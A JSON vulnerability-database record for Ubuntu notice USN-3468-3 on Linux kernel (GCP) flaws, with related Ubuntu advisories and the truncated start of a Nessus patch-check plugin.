{"id": "USN-3468-3", "bulletinFamily": "unix", "title": "Linux kernel (GCP) vulnerabilities", "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "published": "2017-10-31T00:00:00", "modified": "2017-10-31T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://ubuntu.com/security/notices/USN-3468-3", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2017-10911", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000252", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-14340", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-11176", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-10663"], "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "type": "ubuntu", "lastseen": "2020-07-02T11:40:42", "edition": 6, "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000252", "CVE-2017-14340", "CVE-2017-10663", "CVE-2017-11176", "CVE-2017-10911"]}, {"type": "ubuntu", "idList": ["USN-3420-2", "USN-3405-2", "USN-3468-2", "USN-3469-1", "USN-3469-2", "USN-3470-2", "USN-3470-1", "USN-3420-1", "USN-3468-1", "USN-3405-1"]}, {"type": "nessus", "idList": ["UBUNTU_USN-3468-1.NASL", "FEDORA_2017-DEB70B495E.NASL", "PHOTONOS_PHSA-2017-0025_LINUX.NASL", "UBUNTU_USN-3468-3.NASL", "VIRTUOZZO_VZA-2017-065.NASL", "UBUNTU_USN-3470-1.NASL", "PHOTONOS_PHSA-2017-0036_LINUX.NASL", "PHOTONOS_PHSA-2017-0036.NASL", "FEDORA_2017-98548B066B.NASL", "UBUNTU_USN-3468-2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703927", "OPENVAS:1361412562310873079", "OPENVAS:1361412562310843357", "OPENVAS:1361412562310843356", "OPENVAS:1361412562310882840", "OPENVAS:1361412562311220171154", "OPENVAS:1361412562311220171155", "OPENVAS:1361412562310872902", "OPENVAS:1361412562310843353", "OPENVAS:1361412562310843352"]}, {"type": "f5", "idList": ["F5:K56450659"]}, {"type": "virtuozzo", "idList": ["VZA-2017-065"]}, {"type": "fedora", "idList": ["FEDORA:B60446046988", "FEDORA:274BB60875C4", "FEDORA:83CF561C31BC"]}, {"type": "exploitdb", "idList": ["EDB-ID:45553", "EDB-ID:45554"]}, {"type": "zdt", "idList": ["1337DAY-ID-31273"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4F74638D00AC37320CD01F8B963CC200"]}, {"type": "redhat", "idList": ["RHSA-2018:0169", "RHSA-2018:3822", "RHSA-2017:2918"]}, {"type": "amazon", "idList": ["ALAS-2017-914", "ALAS-2017-868"]}, {"type": "centos", "idList": ["CESA-2018:0169"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-0169", "ELSA-2018-0008", "ELSA-2017-3633", "ELSA-2017-3632"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3945-1:532A6", "DEBIAN:DSA-3927-1:A186E", "DEBIAN:DLA-1099-1:57108"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2741-1", "OPENSUSE-SU-2017:2739-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:01D42C16D02067C2EABD907705968B25", "CFOUNDRY:9D1D2721EB965138C5B62A17BAC259EF", "CFOUNDRY:14981E32944F89BB69AF2D0158A379F0"]}], "modified": "2020-07-02T11:40:42", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-07-02T11:40:42", "rev": 2}, "vulnersScore": 7.8}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.10.0-1008-gcp", "packageVersion": "4.10.0-1008.8"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-gcp", "packageVersion": "4.10.0.1008.10"}], "scheme": null}

{"ubuntu": [{"lastseen": "2020-07-02T11:42:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "USN-3468-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux Hardware \nEnablement (HWE) kernel from Ubuntu 17.04 for Ubuntu 16.04 LTS.\n\nIt was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-2", "href": "https://ubuntu.com/security/notices/USN-3468-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:35:46", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "description": "It was discovered that the KVM subsystem in the Linux kernel did not \nproperly bound guest IRQs. A local attacker in a guest VM could use this to \ncause a denial of service (host system crash). (CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 7, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3468-1", "href": "https://ubuntu.com/security/notices/USN-3468-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:43:57", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2016-8632", "CVE-2017-10661", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663", "CVE-2017-10662"], "description": "Qian Zhang discovered a heap-based buffer overflow in the tipc_msg_build() \nfunction in the Linux kernel. A local attacker could use to cause a denial \nof service (system crash) or possibly execute arbitrary code with \nadministrative privileges. (CVE-2016-8632)\n\nDmitry Vyukov discovered that a race condition existed in the timerfd \nsubsystem of the Linux kernel when handling might_cancel queuing. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10661)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10662, CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3470-1", "href": "https://ubuntu.com/security/notices/USN-3470-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:35:03", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2016-8632", "CVE-2017-10661", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663", "CVE-2017-10662"], "description": "USN-3470-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nQian Zhang discovered a heap-based buffer overflow in the tipc_msg_build() \nfunction in the Linux kernel. A local attacker could use to cause a denial \nof service (system crash) or possibly execute arbitrary code with \nadministrative privileges. (CVE-2016-8632)\n\nDmitry Vyukov discovered that a race condition existed in the timerfd \nsubsystem of the Linux kernel when handling might_cancel queuing. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10661)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10662, CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)", "edition": 7, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3470-2", "href": "https://ubuntu.com/security/notices/USN-3470-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12762", "CVE-2017-8831", "CVE-2017-1000251", "CVE-2017-10663"], "description": "It was discovered that a buffer overflow existed in the Bluetooth stack of \nthe Linux kernel when handling L2CAP configuration responses. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-1000251)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nIt was discovered that a buffer overflow existed in the ioctl handling code \nin the ISDN subsystem of the Linux kernel. A local attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-12762)\n\nPengfei Wang discovered that a race condition existed in the NXP SAA7164 TV \nDecoder driver for the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-8831)", "edition": 6, "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "USN-3420-1", "href": "https://ubuntu.com/security/notices/USN-3420-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12762", "CVE-2017-8831", "CVE-2017-1000251", "CVE-2017-10663"], "description": "USN-3420-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nIt was discovered that a buffer overflow existed in the Bluetooth stack of \nthe Linux kernel when handling L2CAP configuration responses. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-1000251)\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation \nin the Linux kernel did not properly validate superblock metadata. A local \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2017-10663)\n\nIt was discovered that a buffer overflow existed in the ioctl handling code \nin the ISDN subsystem of the Linux kernel. A local attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-12762)\n\nPengfei Wang discovered that a race condition existed in the NXP SAA7164 TV \nDecoder driver for the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-8831)", "edition": 5, "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "USN-3420-2", "href": "https://ubuntu.com/security/notices/USN-3420-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "Anthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux \nkernel in some situations did not properly prevent second level guests \nfrom reading and writing the hardware CR8 register. A local attacker \nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel \ndid not properly restrict key reads on negatively instantiated keys. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly initialize data returned to user space in some situations. A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device \ndriver in the Linux kernel contained race conditions when fetching \nfrom the ring-buffer. A local attacker could use this to cause a \ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985)", "edition": 6, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3469-1", "href": "https://ubuntu.com/security/notices/USN-3469-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "USN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux \nkernel in some situations did not properly prevent second level guests \nfrom reading and writing the hardware CR8 register. A local attacker \nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel \ndid not properly restrict key reads on negatively instantiated keys. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux \nkernel did not properly validate data structures. A local attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly initialize data returned to user space in some situations. A local \nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in \nthe Linux kernel did not properly handle attempts to set reserved bits in a \ntask's extended state (xstate) area. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device \ndriver in the Linux kernel contained race conditions when fetching \nfrom the ring-buffer. A local attacker could use this to cause a \ndenial of service (infinite loop). (CVE-2017-9984, CVE-2017-9985)", "edition": 5, "modified": "2017-10-31T00:00:00", "published": "2017-10-31T00:00:00", "id": "USN-3469-2", "href": "https://ubuntu.com/security/notices/USN-3469-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-7495", "CVE-2017-7541", "CVE-2015-7837"], "description": "It was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nHuang Weller discovered that the ext4 filesystem implementation in the \nLinux kernel mishandled a needs-flushing-before-commit list. A local \nattacker could use this to expose sensitive information. (CVE-2017-7495)\n\nIt was discovered that a buffer overflow existed in the Broadcom FullMAC \nWLAN driver in the Linux kernel. A local attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2017-7541)\n\nIt was discovered that the Linux kernel did not honor the UEFI secure boot \nmode when performing a kexec operation. A local attacker could use this to \nbypass secure boot restrictions. (CVE-2015-7837)", "edition": 7, "modified": "2017-08-28T00:00:00", "published": "2017-08-28T00:00:00", "id": "USN-3405-1", "href": "https://ubuntu.com/security/notices/USN-3405-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:13", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-7495", "CVE-2017-7541", "CVE-2015-7837"], "description": "USN-3405-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX \nmessage queue implementation in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-11176)\n\nHuang Weller discovered that the ext4 filesystem implementation in the \nLinux kernel mishandled a needs-flushing-before-commit list. A local \nattacker could use this to expose sensitive information. (CVE-2017-7495)\n\nIt was discovered that a buffer overflow existed in the Broadcom FullMAC \nWLAN driver in the Linux kernel. A local attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2017-7541)\n\nIt was discovered that the Linux kernel did not honor the UEFI secure boot \nmode when performing a kexec operation. A local attacker could use this to \nbypass secure boot restrictions. (CVE-2015-7837)", "edition": 6, "modified": "2017-08-28T00:00:00", "published": "2017-08-28T00:00:00", "id": "USN-3405-2", "href": "https://ubuntu.com/security/notices/USN-3405-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T07:33:32", "description": "It was discovered that the KVM subsystem in the Linux kernel did not\nproperly bound guest IRQs. A local attacker in a guest VM could use\nthis to cause a denial of service (host system crash).\n(CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-11-01T00:00:00", "title": "Ubuntu 16.04 LTS : linux-gcp vulnerabilities (USN-3468-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11176", "CVE-2017-1000252", "CVE-2017-10911", "CVE-2017-14340", "CVE-2017-10663"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3468-3.NASL", "href": "https://www.tenable.com/plugins/nessus/104319", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3468-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104319);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10663\", \"CVE-2017-10911\", \"CVE-2017-11176\", \"CVE-2017-14340\");\n script_xref(name:\"USN\", value:\"3468-3\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-gcp vulnerabilities (USN-3468-3)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the KVM subsystem in the Linux kernel did not\nproperly bound guest IRQs. A local attacker in a guest VM could use\nthis to cause a denial of service (host system crash).\n(CVE-2017-1000252)\n\nIt was discovered that the Flash-Friendly File System (f2fs)\nimplementation in the Linux kernel did not properly validate\nsuperblock metadata. A local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2017-10663)\n\nAnthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nIt was discovered that a use-after-free vulnerability existed in the\nPOSIX message queue implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-11176)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3468-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.10-gcp and / or linux-image-gcp\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! 